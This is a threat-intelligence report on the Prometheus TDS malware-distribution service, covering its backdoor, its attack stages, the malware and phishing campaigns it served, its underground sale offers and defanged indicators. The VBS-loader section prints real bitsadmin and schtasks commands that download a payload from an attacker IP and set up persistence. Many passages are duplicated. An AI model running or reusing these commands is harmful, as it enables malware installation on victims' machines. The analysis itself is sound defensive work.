ENGLISH
05.08.2021
Prometheus TDS
The key to success for Campo Loader, Hancitor, IcedID, and QBot
Viktor Okorokov
Lead Threat Intelligence analyst
Nikita Rostovcev
Threat Intelligence analyst
Introduction
In the spring of 2021, Group-IB's Threat Intelligence analysts discovered traces of a malware campaign distributing Hancitor. The researchers took an interest in an untypical pattern of the downloader's distribution, which was subsequently described by Unit 42[1] and McAfee[2] researchers as a new technique designed to hide documents containing malicious links from web scanners' radars. However, the data extracted by Group-IB's analysts indicates that a similar pattern is also used to distribute malware such as Campo Loader, IcedID, QBot, SocGholish, and Buer Loader.
Group-IB discovered at least 3,000 targets of separate malware campaigns that make use of the same scheme. By analyzing the list of targets, the experts were able to establish the two most active campaigns. The first targeted individuals in Belgium, and the second targeted companies, corporations, universities, and government organizations in the United States.
By analyzing the malware distribution campaigns, Group-IB's experts were able to conclude that it was possible for them to be carried out using the same MaaS solution. This assumption was later confirmed by Group-IB's analysts after they found a sale notice for a service designed to distribute malicious files and redirect users to phishing and malicious sites — Prometheus TDS (Traffic Direction System) — on one of the underground platforms.
Group-IB discovered at least 3,000 targets of separate malware campaigns that make use of the same scheme. By analyzing the list of targets, the experts were able to establish the two most active campaigns. The first targeted individuals in Belgium, and the second targeted companies, corporations, universities, and government organizations in the United States.
By analyzing the malware distribution campaigns, Group-IB's experts were able to conclude that it was possible for them to be carried out using the same MaaS solution. This assumption was later confirmed by Group-IB's analysts after they found a sale notice for a service designed to distribute malicious files and redirect users to phishing and malicious sites — Prometheus TDS (Traffic Direction System) — on one of the underground platforms.
Description
Prometheus TDS is an underground service that distributes malicious files and redirects visitors to phishing and malicious sites. This service is made up of the Prometheus TDS administrative panel, in which an attacker configures the necessary parameters for a malicious campaign: downloading malicious files, and configuring restrictions on users' geolocation, browser version, and operating system.
To prevent victims of malicious campaigns from interacting with the administrative panel directly, which may result in the attacker's server being disclosed and blocked, Prometheus TDS uses third-party infected websites that act as a middleman between the attacker's administrative panel and the user. It should also be mentioned that the list of compromised websites is manually added by the malware campaign's operators. The list is uploaded through importing links to web shells. A special PHP file named Prometheus.Backdoor is uploaded to the compromised websites to collect and send back data about the user interacting with the administrative panel. After analyzing the data collected, the administrative panel decides whether to send the payload to the user and/or to redirect them to the specified URL.
More than three thousand email addresses targeted in the first phase of malicious campaigns in which Prometheus TDS was used to send malicious emails were extracted by Group-IB Threat Intelligence analysts. The extracted data analysis helped identify the most active campaigns, one targeting individuals in Belgium (more than 2,000 emails) and the other targeting US government agencies, companies, and corporations in various sectors (banking and finance, retail, energy and mining, cybersecurity, healthcare, IT, and insurance), (more than 260 emails). The data about identified targets of attacks with the use of Prometheus TDS and companies affected as their result has been handed over to the US, German and Belgian CERTs.
To prevent victims of malicious campaigns from interacting with the administrative panel directly, which may result in the attacker's server being disclosed and blocked, Prometheus TDS uses third-party infected websites that act as a middleman between the attacker's administrative panel and the user. It should also be mentioned that the list of compromised websites is manually added by the malware campaign's operators. The list is uploaded through importing links to web shells. A special PHP file named Prometheus.Backdoor is uploaded to the compromised websites to collect and send back data about the user interacting with the administrative panel. After analyzing the data collected, the administrative panel decides whether to send the payload to the user and/or to redirect them to the specified URL.
More than three thousand email addresses targeted in the first phase of malicious campaigns in which Prometheus TDS was used to send malicious emails were extracted by Group-IB Threat Intelligence analysts. The extracted data analysis helped identify the most active campaigns, one targeting individuals in Belgium (more than 2,000 emails) and the other targeting US government agencies, companies, and corporations in various sectors (banking and finance, retail, energy and mining, cybersecurity, healthcare, IT, and insurance), (more than 260 emails). The data about identified targets of attacks with the use of Prometheus TDS and companies affected as their result has been handed over to the US, German and Belgian CERTs.
Targets of malicious campaigns with the use of Prometheus TDS
Attack scheme using Prometheus TDS
The distribution of malware using Prometheus TDS is carried out in several stages.
Stage 1
The user receives an email containing one of the following elements:
● An HTML file that redirects the user to a compromised site on which Prometheus.Backdoor is installed;
● A link to a web shell that redirects users to a specified URL, in this case to one of the addresses used by Prometheus TDS;
● A link to a Google Doc containing the URL redirecting users to a malicious link.
Stage 1
The user receives an email containing one of the following elements:
● An HTML file that redirects the user to a compromised site on which Prometheus.Backdoor is installed;
● A link to a web shell that redirects users to a specified URL, in this case to one of the addresses used by Prometheus TDS;
● A link to a Google Doc containing the URL redirecting users to a malicious link.
The implementation of malicious campaigns with the use of Prometheus TDS
Google Docs files used by Prometheus TDS
Stage 2
The user opens the attachment or follows the link and is redirected to the Prometheus.Backdoor URL. Prometheus.Backdoor collects the available data on the user.
Stage 3
The data collected is sent to the Prometheus TDS admin panel. This admin panel then decides whether to instruct the backdoor to send a malicious file to the users and/or to redirect them to the specified URL.
The user opens the attachment or follows the link and is redirected to the Prometheus.Backdoor URL. Prometheus.Backdoor collects the available data on the user.
Stage 3
The data collected is sent to the Prometheus TDS admin panel. This admin panel then decides whether to instruct the backdoor to send a malicious file to the users and/or to redirect them to the specified URL.
Analysis of Prometheus.Backdoor
Malicious campaigns using Prometheus TDS are carried out via hacked sites with Prometheus.Backdoor installed on them. The backdoor is controlled through the admin panel.
Prometheus TDS admin panel
The data exchange between the administrative panel and the backdoor is encrypted with an XOR cipher. The key for this cipher is explicitly hardcoded in the Prometheus.Backdoor settings, along with the address of the administrative panel used by the attackers to manage backdoors on infected sites.
A fragment of the Prometheus.Backdoor code containing the address of the administrative panel, a key for encrypting transmitted data, and functions for encrypting and decrypting data
After the user visits the infected site, Prometheus.Backdoor collects basic information about them: IP address, User-Agent, Referrer header, time zone, and language data, and then forwards this information to the Prometheus admin panel.
Part of the Prometheus.Backdoor code used to collect information about the user's time zone
Part of the Prometheus.Backdoor code showing the algorithm used to generate a request to the administrative panel for the transfer of visitor data
If the user is not recognized as a bot, then, depending on the configuration, the administrative panel can send a command to redirect the user to the specified URL, or to send a malicious file. The payload file is sent using a special JavaScript code. Most often, the malicious software can be found in weaponized Microsoft Word or Excel documents, however, the attackers also use ZIP and RAR files. In some cases, the user will be redirected to a legitimate site immediately after downloading the file, so it will appear to them like the file was downloaded from a safe source.
Part of the Prometheus.Backdoor code showing a method for serving malicious files
Malware campaigns analysis
Campo Loader
Analyzing the extracted files, Group-IB Threat Intelligence analysts found 18 unique malicious documents relating to the Campo Loader, aka the BazaLoader malware. After downloading the malware, the user is redirected to the DocuSign or USPS sites as a distraction from the malware's activity.
Analyzing the extracted files, Group-IB Threat Intelligence analysts found 18 unique malicious documents relating to the Campo Loader, aka the BazaLoader malware. After downloading the malware, the user is redirected to the DocuSign or USPS sites as a distraction from the malware's activity.
A screenshot of a decoy document from the "Campo Loader" distribution campaign
Campo Loader spreads through malicious macros in Microsoft Office documents. After the victim activates the macros, the loader saves and then decodes the .dll file, which is executed through certutil. After the dumped .dll file is executed, it sends an HTTP request to its C&C server:
Content of the malicious macros
The server processes the incoming request and, depending on the victim's geolocation (based on their IP address) decides whether to send the payload or redirect them to Yahoo!, GNU, or other resources. The downloader takes its name from the path of the same name in HTTP requests used to download malicious files during the second stage.
Redirection to gnu.org
If the administrative panel gives the command to send the payload, then the user is redirected to the resource where it is stored or receives it directly from the C&C server.
Results of the request satisfying the server's requirements to upload a second stage file
Analysis revealed that Campo Loader was used at various times to distribute TrickBot and Ursnif/Gozi bankers, etc.
Campo Loader administrative panel
Hancitor
Monitoring of Prometheus TDS revealed 34 malicious documents relating to the Hancitor malware, which is a downloader trojan.
Monitoring of Prometheus TDS revealed 34 malicious documents relating to the Hancitor malware, which is a downloader trojan.
A screenshot of a decoy document from the Hancitor distribution campaign
After downloading the malicious document, the victim is either redirected to the DocuSign website, or to phishing sites using IDN domains that imitate the sites of two US banks.
A phishing page to which a user was redirected after downloading a malicious Hancitor load located on an IDN domain xn--keynvigatorkey-yp8g[.]com (https://urlscan.io/result/108463b8-7c0d-4644-9d2b-52cbca3426f8/)
One of the files identified (SHA1: 41138f0331c3edb731c9871709cffd01e4ba2d88) was sent in a phishing email containing a link to a Google Doc. The document stored in Google Docs contained the link hXXps://webworks.nepila[.]com/readies.php. When the victim clicks on the link, a request is sent to Prometheus.Backdoor. The server then processes the data collected about the user's system and decides whether to send the payload or not.
An example of requests to a site containing Prometheus.Backdoor, with successful delivery of a malicious document and subsequent redirection to DocuSign
The screenshot above shows that the response to the first request for the file "readies.php" is 937 bits, while the second one is 424,594 bits. This means that the server approved the victim's device settings and the second request resulted in the download of the Base64 file "0301_343810790.doc". After downloading the file, the victim is redirected to Docusign.com.
Part of the Prometheus.Backdoor code showing a malicious file distribution pattern
The saved file "0301_343810790.doc" is a .doc file containing malicious macros. After activating the macros in the document, the DLL file is dropped and executed by path c:\users\%username%\appdata\local\temp\Static.dll, using rundll32.exe. After the file has been executed, the following HTTP requests are sent:
● hxxp://api.ipify[.]org/
● hxxp://ementincied[.]com/8/forum.php
● hxxp://mymooney[.]ru/6fwedzs3w3fg.exe
● hxxp://api.ipify[.]org/
● hxxp://ementincied[.]com/8/forum.php
● hxxp://mymooney[.]ru/6fwedzs3w3fg.exe
The downloaded file "6fwedzs3w3fg.exe" (SHA1: 7394632d8cfc00c35570d219e49de63076294b6b ) is a sample of Ficker Stealer
In April 2021, Unit 42 researchers partially analyzed this campaign. The experts also mention the Ficker Stealer, Cobalt Strike, and Send-Safe spambots in their research (https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/).
QBot
The following documents were found among the files used to distribute the banking trojan QBot.
The following documents were found among the files used to distribute the banking trojan QBot.
These documents are lure files that require macro activation when launched. As soon as the macros are activated, an HTTP request is sent to download the DLL file with the payload.
Decoy document from the QBot distribution campaign
The malicious document discovered was sending requests to the following URL addresses:
● https://inpulsion[.]net/ds/0702.gif
● https://aramiglobal[.]com/ds/0502.gif
● https://inpulsion[.]net/ds/0702.gif
● https://aramiglobal[.]com/ds/0502.gif
The content of malicious macros
Unfortunately, at the time of analysis, these files were no longer available. However, our data suggests that QBot is loaded via these paths.
IcedID
One of the malicious documents sent using Prometheus TDS distributed the banking Trojan IcedID, aka Bokbot.
One of the malicious documents sent using Prometheus TDS distributed the banking Trojan IcedID, aka Bokbot.
A screenshot of a decoy document from the IcedID malware distribution campaign
After opening the document and running the macros, the office file attempted to download and run the DLL file at hXXp://denazao[.]info/images/1j.djvu. The file was not available at the time of analysis. A similar office document was found on VirusTotal (https://www.virustotal.com/gui/file/ae93a0e0085bcae5ec9f21cb71df0b7d3a6682fa5c8ac4e763f70884cb7bf5c6/details); it also downloaded the payload from hXXp://denazao[.]info/images/1j.djvu. After launching the payload, the request was sent to the IcedID C&C server located at hXXp://twotimercvac[.]uno/.
Graph representing the IcedID C2 environment
VBS Loader
During the analysis, the specialists found three samples of an unidentified VBS loader. After downloading these files, the user is redirected to the USPS website. When the user clicks on a malicious link, Prometheus TDS asks the user to download a ZIP archive containing a VBS script. After the script is launched, the payload is downloaded in the form of another VBS script using bitsadmin. The downloaded file is launched using the Windows Task Scheduler by creating a command that runs the VBS script every 30 minutes starting at 00:00.
During the analysis, the specialists found three samples of an unidentified VBS loader. After downloading these files, the user is redirected to the USPS website. When the user clicks on a malicious link, Prometheus TDS asks the user to download a ZIP archive containing a VBS script. After the script is launched, the payload is downloaded in the form of another VBS script using bitsadmin. The downloaded file is launched using the Windows Task Scheduler by creating a command that runs the VBS script every 30 minutes starting at 00:00.
Part of the obfuscated VBS loader containing the URL for the payload download
To download and run the payload, the VBS script executes a set of special commands using bitsadmin and schtasks:
● cmd /k exit | exit & bitsadmin /create EncodingFirm & exit
● cmd /k exit | exit & bitsadmin /addfile EncodingFirm hXXp://155[.]94[.]193[.]10/user/get/ButPrinciple1619186669 C:\Users\<User>\AppData\Local\Temp\DefineKeeps.tmp & exit
● cmd /k exit | exit & bitsadmin /resume EncodingFirm & exit
● cmd /k exit | exit & schtasks /create /sc minute /mo 30 /tn "Task Update ButPrinciple" /f /st 00:00 /tr C:\Users\<User>\AppData\Local\ButPrinciple\ButPrinciple.vbs & exit
● cmd /k exit | exit & bitsadmin /complete EncodingFirm & exit
● cmd /k exit | exit & bitsadmin /reset & exit
● cmd /k exit | exit & bitsadmin /create EncodingFirm & exit
● cmd /k exit | exit & bitsadmin /addfile EncodingFirm hXXp://155[.]94[.]193[.]10/user/get/ButPrinciple1619186669 C:\Users\<User>\AppData\Local\Temp\DefineKeeps.tmp & exit
● cmd /k exit | exit & bitsadmin /resume EncodingFirm & exit
● cmd /k exit | exit & schtasks /create /sc minute /mo 30 /tn "Task Update ButPrinciple" /f /st 00:00 /tr C:\Users\<User>\AppData\Local\ButPrinciple\ButPrinciple.vbs & exit
● cmd /k exit | exit & bitsadmin /complete EncodingFirm & exit
● cmd /k exit | exit & bitsadmin /reset & exit
At the time of analysis, there was only one similar VBS loader sample on VirusTotal, which was detectable by only one antivirus solution. (https://www.virustotal.com/gui/file/a2bd96db3eb0f4e5ab3dd013b0a0ba69c7c84986925623dc31e3b911d963e1b9/details).
Antivirus detection for file fcd8674f8df4390d90dad6c31a3dd6f33d6a74de
Buer Loader
Within the campaign, the file "document010498(1).zip" was also distributed. It contained the file "document010498.jnlp", which downloads the payload from the domain "secure-doc-viewer[.]com".
Unfortunately, at the time of analysis, the domain was not active. Based on the contents of the file, it seems reasonable to assume that it is a decoy document used to download files relating to the second stage.
Within the campaign, the file "document010498(1).zip" was also distributed. It contained the file "document010498.jnlp", which downloads the payload from the domain "secure-doc-viewer[.]com".
Unfortunately, at the time of analysis, the domain was not active. Based on the contents of the file, it seems reasonable to assume that it is a decoy document used to download files relating to the second stage.
Contents of the file document010498.jnlp
An analysis of the domain "secure-doc-viewer[.]com" by the experts using Group-IB's graph revealed that the owner's name, as indicated in the WHOIS records of the domain, is "artem v gushin." The analysis also showed that this name is connected to more than 50 domains.
Part of the connections of the domain secure-doc-viewer[.]com according to WHOIS records
Among the related domains, researchers identified several of them using the same keywords:
● pdfsecure[.]net
● securepdfviewer[.]com
● invoicesecure[.]net
The domains are also related to .jnlp files, for example, "invoice.jnlp" (SHA1: e3249b46e76b3d94b46d45a38e175ef80b7d0526).
● pdfsecure[.]net
● securepdfviewer[.]com
● invoicesecure[.]net
The domains are also related to .jnlp files, for example, "invoice.jnlp" (SHA1: e3249b46e76b3d94b46d45a38e175ef80b7d0526).
Content of the invoice.jnlp
Several studies[3] indicate that the above domains are part of the Buer Loader distribution campaign.
SocGholish
The analysis of the URLs of the compromised sites used in the Prometheus TDS infrastructure revealed that some of them redirect the user to the home page of the compromised website.
The analysis of the URLs of the compromised sites used in the Prometheus TDS infrastructure revealed that some of them redirect the user to the home page of the compromised website.
Prometheus.Backdoor URL that redirects the visitor to the home page of the compromised site
Through research, it was discovered that these sites are used to distribute the SocGholish malware under the guise of Google Chrome browser updates.
Loading a landing page with fake Google Chrome browser updates
At the same time, SocGholish uses a malicious file distribution pattern very similar to the script used by Prometheus TDS. When the user visits an infected site, they see a page with JavaScript code that contains a Base64 encoded ZIP archive with a malicious file that will be downloaded if the user clicks on the "Update browser" button.
Part of the SocGholish landing page
To the user, this page appears to be offering browser updates.
Screenshot of the fake page offering a Chrome browser update
Fake VPN
In addition to distributing malicious files, Prometheus TDS is also used as a classic TDS to redirect users to specific sites. One of these sites is the fake site of a well-known VPN provider located at hXXps://huvpn[.]com/free-vpn/. Clicking the download button initiates the download of a malicious EXE file from hXXps://windscribe.s3.us-east-2.amazonaws[.]com/Windscribe.exe (SHA1: f729b75d68824f200bebe3c3613c478f9d276501).
In addition to distributing malicious files, Prometheus TDS is also used as a classic TDS to redirect users to specific sites. One of these sites is the fake site of a well-known VPN provider located at hXXps://huvpn[.]com/free-vpn/. Clicking the download button initiates the download of a malicious EXE file from hXXps://windscribe.s3.us-east-2.amazonaws[.]com/Windscribe.exe (SHA1: f729b75d68824f200bebe3c3613c478f9d276501).
A screenshot of a fake Windscribe download page
Viagra SPAM
Prometheus TDS also redirected users to sites selling pharmaceutical products. Operators of such sites often have affiliate and partnership programs. Partners, in turn, often resort to aggressive SPAM campaigns in order to increase the earnings within the affiliate program. Analysis of the Prometheus infrastructure by Group-IB specialists revealed links that redirect users to sites relating to a Canadian pharmacy.
Prometheus TDS also redirected users to sites selling pharmaceutical products. Operators of such sites often have affiliate and partnership programs. Partners, in turn, often resort to aggressive SPAM campaigns in order to increase the earnings within the affiliate program. Analysis of the Prometheus infrastructure by Group-IB specialists revealed links that redirect users to sites relating to a Canadian pharmacy.
The use of Prometheus TDS for spam emails to redirect users to particular websites
Banking phishing
Prometheus TDS was also used to redirect users to banking phishing sites. For example, during a campaign active from March to May 2021, users who followed the link to Prometheus.Backdoor were redirected to fake sites that mimicked the site of a German bank.
Prometheus TDS was also used to redirect users to banking phishing sites. For example, during a campaign active from March to May 2021, users who followed the link to Prometheus.Backdoor were redirected to fake sites that mimicked the site of a German bank.
Example of a phishing page used in the campaign involving Prometheus TDS https://urlscan.io/result/69c84104-f272-4c88-970f-a3131c0580ad/
Offers to buy Prometheus TDS on underground forums
The analysis presented above describes several unrelated campaigns carried out by different hacker groups using Prometheus TDS. Working based on the assumption that Prometheus TDS is a MaaS solution, Group-IB researchers analyzed various underground forums in search of relevant offers and found a topic started by a user with the username Main.
Prometheus TDS
Screenshot of the offer to buy the Prometheus TDS
Group-IB Threat Intelligence & Attribution system discovered that the post offering Prometheus for sale was created in August 2020. The owner of the service claimed that Prometheus TDS is an ANTIBOT redirect system designed to send out emails, work with traffic, and for social engineering. In addition, Prometheus TDS can validate web shells, create and configure redirects, operate via proxy, and work with Google accounts, etc. Moreover, the system is able to validate users based on a blacklist, which makes it possible for malicious links to avoid being added to antivirus and spam databases.
Prometheus has two standard modes:
The cost of the system is $250 per month. Screenshots from Prometheus TDS admin level provided by Main can be found below:
Prometheus has two standard modes:
- Redirecting users to a target page;
- Issuing files for download (DOC, PDF, JS, VBS, EXE).
The cost of the system is $250 per month. Screenshots from Prometheus TDS admin level provided by Main can be found below:
BRChecker
When examining and monitoring the infrastructure used to host the Prometheus TDS administrative panels, Group-IB experts discovered that some of the servers on which the Prometheus TDS admin panel was previously located now host another unknown panel.
The following is a list of addresses at which different panels were located at different times:
● 188.130.138[.]63;
● 188.130.138[.]22;
● 188.130.138[.]236;
● 188.130.138[.]61;
● 185.186.142[.]32.
Based on the contents of this admin panel's JS scripts, Group-IB experts assumed that it is a panel from another solution called BRChecker.
The following is a list of addresses at which different panels were located at different times:
● 188.130.138[.]63;
● 188.130.138[.]22;
● 188.130.138[.]236;
● 188.130.138[.]61;
● 185.186.142[.]32.
Based on the contents of this admin panel's JS scripts, Group-IB experts assumed that it is a panel from another solution called BRChecker.
Listing of scripts from BRCheker admin panel
An offer to sell the BRChecker system presented as an email address bruter\checker was for the first time posted by the user with the username Mainin mid-June 2018. According to the developer's description, the system works via modules (workers), installed on rented VPS servers, and controlled through a single admin panel for subsequent brute-forcing or verification of login/password bindings.
Screenshot of a sale announcement for BRCheker
As of May 2021, the cost of the system was $490. Screenshots of BRChecker admin panel provided by Main can be found below:
Screenshot of the BRChecker admin panel
The contents of the screenshots in the for-sale notice made it possible to verify that the unknown panel detected before is indeed related to BRChecker.
Indicators
Prometheus.Backdoor JavaScript
Prometheus TDS Admin
109.248.11.132
109.248.11.204
109.248.11.67
109.248.203.10
109.248.203.112
109.248.203.168
109.248.203.198
109.248.203.202
109.248.203.207
109.248.203.23
109.248.203.33
185.158.114.121
185.186.142.191
185.186.142.32
185.186.142.59
185.186.142.67
185.186.142.77
188.130.138.130
188.130.138.22
188.130.138.236
188.130.138.57
188.130.138.61
188.130.138.63
188.130.138.70
188.130.139.103
188.130.139.203
188.130.139.228
188.130.139.5
188.130.139.88
46.8.210.13
46.8.210.30
51.15.27.25
62.138.0.68
109.248.11.204
109.248.11.67
109.248.203.10
109.248.203.112
109.248.203.168
109.248.203.198
109.248.203.202
109.248.203.207
109.248.203.23
109.248.203.33
185.158.114.121
185.186.142.191
185.186.142.32
185.186.142.59
185.186.142.67
185.186.142.77
188.130.138.130
188.130.138.22
188.130.138.236
188.130.138.57
188.130.138.61
188.130.138.63
188.130.138.70
188.130.139.103
188.130.139.203
188.130.139.228
188.130.139.5
188.130.139.88
46.8.210.13
46.8.210.30
51.15.27.25
62.138.0.68
Campo Loader
Hancitor
Qbot
IcedID
VBS Loader
Buer Loader
SocGholish
Fake VPN
Pharma spam
● hotaiddeal.su
● yourmedsquality.su
● goodherbwebmart.com
● ella.purecaremarket.su
● yourmedsquality.su
● goodherbwebmart.com
● ella.purecaremarket.su
Phishing websites
● banking.sparkasse.de-id1897ajje9021ucn9021345345b0juah10zb1092uhda.xyz
● banking.sparkasse.de-id1897ajjed9021uc421sn9345514ah10zb4351092uhda.xyz
● banking.sparkasse.de-id1877au901501fj82a7fn3a54dx2gsboac8s02bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82a7fnat9bhwhboa8ss02bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82ca7fnas9sbssdfhswahboa802bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82ca7cf2nas9bswsdfhaswhboa802bauc248naxx.xyz
● banking.sparkasse.de-id-19dhjb732ba9nabcz29acb78s21acz19icnba7s.xyz
● banking.sparkasse.de-id1897ajjed9021uc421sn9345514ah10zb4351092uhda.xyz
● banking.sparkasse.de-id1877au901501fj82a7fn3a54dx2gsboac8s02bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82a7fnat9bhwhboa8ss02bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82ca7fnas9sbssdfhswahboa802bauc248naxx.xyz
● banking.sparkasse.de-id1877au901501fj82ca7cf2nas9bswsdfhaswhboa802bauc248naxx.xyz
● banking.sparkasse.de-id-19dhjb732ba9nabcz29acb78s21acz19icnba7s.xyz
Other samples
BRChecker Admin panel
109.248.11.85
109.248.203.202
109.248.203.50
185.186.142.32
185.212.131.44
188.130.138.16
188.130.138.22
188.130.138.236
188.130.138.61
188.130.138.63
188.130.139.107
188.130.139.158
195.62.53.109
109.248.203.202
109.248.203.50
185.186.142.32
185.212.131.44
188.130.138.16
188.130.138.22
188.130.138.236
188.130.138.61
188.130.138.63
188.130.139.107
188.130.139.158
195.62.53.109
[1] https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/
[2] https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping/?web_view=true
[3] https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/
https://socinvestigation.com/threat-intelligence-buerloader-malware-latest-iocs/
[2] https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping/?web_view=true
[3] https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/
https://socinvestigation.com/threat-intelligence-buerloader-malware-latest-iocs/
Share
Prevention
Response
Investigation
Products
Company
